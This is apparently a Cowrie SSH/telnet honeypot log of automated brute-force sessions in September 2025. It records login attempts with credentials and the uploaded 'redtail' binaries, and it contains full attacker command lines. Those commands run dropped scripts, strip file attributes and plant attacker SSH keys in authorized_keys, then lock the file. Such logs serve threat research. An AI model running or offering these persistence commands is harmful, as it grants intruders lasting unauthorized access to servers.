{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.611709Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.722100Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.831818Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.833876Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.836664Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.840411Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.844076Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.845531Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.closed","duration":"24.4","message":"Connection lost after 24.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:28.956330Z","src_ip":"212.227.235.229","session":"0a9620b3cbdd"}
{"eventid":"cowrie.session.closed","duration":12.744415283203125,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:34.899031Z","src_ip":"212.227.125.160","session":"477cafd71ce0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":24752,"dst_ip":"1.2.3.4","dst_port":23,"session":"443335565f30","protocol":"telnet","message":"New connection: 212.227.125.160:24752 (1.2.3.4:23) [session: 443335565f30]","sensor":"my-vps","timestamp":"2025-09-08T13:31:35.107230Z"}
{"eventid":"cowrie.session.closed","duration":12.651758193969727,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:38.101345Z","src_ip":"212.227.235.229","session":"6d22a8d4ac23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15327,"dst_ip":"1.2.3.4","dst_port":23,"session":"743062ccdc1e","protocol":"telnet","message":"New connection: 212.227.235.229:15327 (1.2.3.4:23) [session: 743062ccdc1e]","sensor":"my-vps","timestamp":"2025-09-08T13:31:38.479172Z"}
{"eventid":"cowrie.session.closed","duration":12.748123168945312,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:39.666929Z","src_ip":"212.227.235.229","session":"fc0e4753886e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58764,"dst_ip":"1.2.3.4","dst_port":23,"session":"d662b72ed56b","protocol":"telnet","message":"New connection: 212.227.235.229:58764 (1.2.3.4:23) [session: d662b72ed56b]","sensor":"my-vps","timestamp":"2025-09-08T13:31:39.960892Z"}
{"eventid":"cowrie.session.closed","duration":12.780870199203491,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:47.888026Z","src_ip":"212.227.125.160","session":"443335565f30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":18080,"dst_ip":"1.2.3.4","dst_port":23,"session":"98ba4d16a70e","protocol":"telnet","message":"New connection: 212.227.125.160:18080 (1.2.3.4:23) [session: 98ba4d16a70e]","sensor":"my-vps","timestamp":"2025-09-08T13:31:48.096127Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36348,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd768972ee23","protocol":"ssh","message":"New connection: 212.227.235.229:36348 (1.2.3.4:22) [session: bd768972ee23]","sensor":"my-vps","timestamp":"2025-09-08T13:31:49.999773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:31:50.017227Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:31:50.243088Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":32874,"dst_ip":"1.2.3.4","dst_port":22,"session":"6563c481cbe2","protocol":"ssh","message":"New connection: 134.199.174.250:32874 (1.2.3.4:22) [session: 6563c481cbe2]","sensor":"my-vps","timestamp":"2025-09-08T13:31:50.554308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:31:50.555441Z","src_ip":"134.199.174.250","session":"6563c481cbe2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:31:50.877898Z","src_ip":"134.199.174.250","session":"6563c481cbe2"}
{"eventid":"cowrie.session.closed","duration":12.611839771270752,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:51.090939Z","src_ip":"212.227.235.229","session":"743062ccdc1e"}
{"eventid":"cowrie.login.success","username":"root","password":"ZXCasd123","message":"login attempt [root/ZXCasd123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:31:51.158940Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9691,"dst_ip":"1.2.3.4","dst_port":23,"session":"2860c7e5e777","protocol":"telnet","message":"New connection: 212.227.235.229:9691 (1.2.3.4:23) [session: 2860c7e5e777]","sensor":"my-vps","timestamp":"2025-09-08T13:31:51.465527Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:31:51.629514Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:31:51.630367Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:31:51.631846Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:51.865510Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"admin123","message":"login attempt [administrator/admin123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.284228Z","src_ip":"134.199.174.250","session":"6563c481cbe2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:31:52.435140Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.435898Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.667428Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.668276Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.session.closed","duration":12.727080821990967,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.687904Z","src_ip":"212.227.235.229","session":"d662b72ed56b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37172,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fd1a5100a0e","protocol":"ssh","message":"New connection: 212.227.235.229:37172 (1.2.3.4:22) [session: 8fd1a5100a0e]","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.890905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.892152Z","src_ip":"212.227.235.229","session":"8fd1a5100a0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59087,"dst_ip":"1.2.3.4","dst_port":23,"session":"44c26f417316","protocol":"telnet","message":"New connection: 212.227.235.229:59087 (1.2.3.4:23) [session: 44c26f417316]","sensor":"my-vps","timestamp":"2025-09-08T13:31:52.951613Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:31:53.126401Z","src_ip":"212.227.235.229","session":"8fd1a5100a0e"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:53.696751Z","src_ip":"134.199.174.250","session":"6563c481cbe2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:31:54.066446Z","src_ip":"212.227.235.229","session":"8fd1a5100a0e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:55.298691Z","src_ip":"212.227.235.229","session":"8fd1a5100a0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37984,"dst_ip":"1.2.3.4","dst_port":22,"session":"f89d7a89d85c","protocol":"ssh","message":"New connection: 212.227.235.229:37984 (1.2.3.4:22) [session: f89d7a89d85c]","sensor":"my-vps","timestamp":"2025-09-08T13:31:55.524207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:31:55.525768Z","src_ip":"212.227.235.229","session":"f89d7a89d85c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:31:55.754951Z","src_ip":"212.227.235.229","session":"f89d7a89d85c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59894,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b26a411d3c6","protocol":"ssh","message":"New connection: 212.227.235.229:59894 (1.2.3.4:22) [session: 2b26a411d3c6]","sensor":"my-vps","timestamp":"2025-09-08T13:31:56.214395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:31:56.215583Z","src_ip":"212.227.235.229","session":"2b26a411d3c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:31:56.456981Z","src_ip":"212.227.235.229","session":"2b26a411d3c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:31:56.703839Z","src_ip":"212.227.235.229","session":"f89d7a89d85c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:56.934209Z","src_ip":"212.227.235.229","session":"f89d7a89d85c"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:56.936070Z","src_ip":"212.227.235.229","session":"bd768972ee23"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"ctf123","message":"login attempt [ctf/ctf123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:31:57.464267Z","src_ip":"212.227.235.229","session":"2b26a411d3c6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:31:58.707591Z","src_ip":"212.227.235.229","session":"2b26a411d3c6"}
{"eventid":"cowrie.session.closed","duration":12.777669668197632,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:00.873723Z","src_ip":"212.227.125.160","session":"98ba4d16a70e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19505,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c41cdaa63c4","protocol":"telnet","message":"New connection: 212.227.125.160:19505 (1.2.3.4:23) [session: 0c41cdaa63c4]","sensor":"my-vps","timestamp":"2025-09-08T13:32:01.085109Z"}
{"eventid":"cowrie.session.closed","duration":12.608752965927124,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:04.074213Z","src_ip":"212.227.235.229","session":"2860c7e5e777"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11652,"dst_ip":"1.2.3.4","dst_port":23,"session":"23cfa5995ec0","protocol":"telnet","message":"New connection: 212.227.235.229:11652 (1.2.3.4:23) [session: 23cfa5995ec0]","sensor":"my-vps","timestamp":"2025-09-08T13:32:04.419673Z"}
